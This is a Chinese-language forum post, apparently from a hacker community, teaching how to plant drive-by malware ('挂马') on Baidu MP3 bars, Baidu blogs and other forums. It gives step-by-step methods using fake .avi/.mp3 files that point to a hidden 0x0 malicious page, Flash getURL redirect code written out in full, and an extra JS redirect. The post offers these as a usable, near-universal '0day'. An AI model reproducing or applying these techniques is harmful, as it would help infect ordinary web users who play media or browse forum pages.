无限0day....

其实0day的关键在于发现........心细责成...

我认为0day其实也不代表很牛.....也是时代的发展发.....最近百度博客的挂马

抄的很火。。。呵呵 这样的东西 只是心细的人都会发现。本人不善于言词....

开正题.....不知道大家看过我写的关于QQ空间的 跳转。。。。。

看过的 应该就理解了.....现在很流行利用avi MP3 WMA 等的只要是Windows自带的 Media Player 播放的就OK....

第一种跳转隐藏挂马方式....用记事本建立的个空文本. 然后内容写 http://xxx.xxx.xxx/ma.html 这样的地址。。注意把这个页子改成0x0 的大小...

以免被发现。。。。。写好后 保存成avi 或者mp3...不知道大家发现没...

百度MP3挂马 就是这么 挂的。。。只要搜索些比较流行的歌曲。。。就有人利用

这方法来挂马...然后把你保存好的 avi或者mp3格式的文件传到个空间 然后用个播放器

的代码 连接你做好的avi或者MP3文件...当有人浏览的时候页子会自己跳过去....

第二种 挂马方式Flash+avi或者mp3结合......手先用Flash8.....做个跳转的FLASH

的文件...在flash的代码筐里写

加入以下代码：
getURL("这里写你要跳转的地址","");
stop();
_parent.play();
stop();

编译成功后...在用上面的方法在写个带连接的 MP3或者avi的文件。。。

在论坛挂马加入播放的文件....手先连接你做好的mp3或者avi...文件在通过flash文件

乖乖的跳到你挂马的页子上了......也可以反着来

那得根据情况了.....反着来就是连接flash文件 在跳掉 mp3或者avi文件地址...

则又会乖乖的跳到你挂马的页子上了....

第三种 就是老方法 不用我多说 直接用flash文件跳你挂马的页子上....

不过 在QQ空间这方法不行 可能是 过滤了flash的代码.....

OK.....这算个小小的 0day....基本通杀 各种论坛....

用这三种方法可以在 百度mp3吧 挂马 和百度博客挂马。。。如果百度博客挂不了马

还可以在马的页子上加个JS调用 让他 不管怎么地 就要给老子跳.....

哈哈.......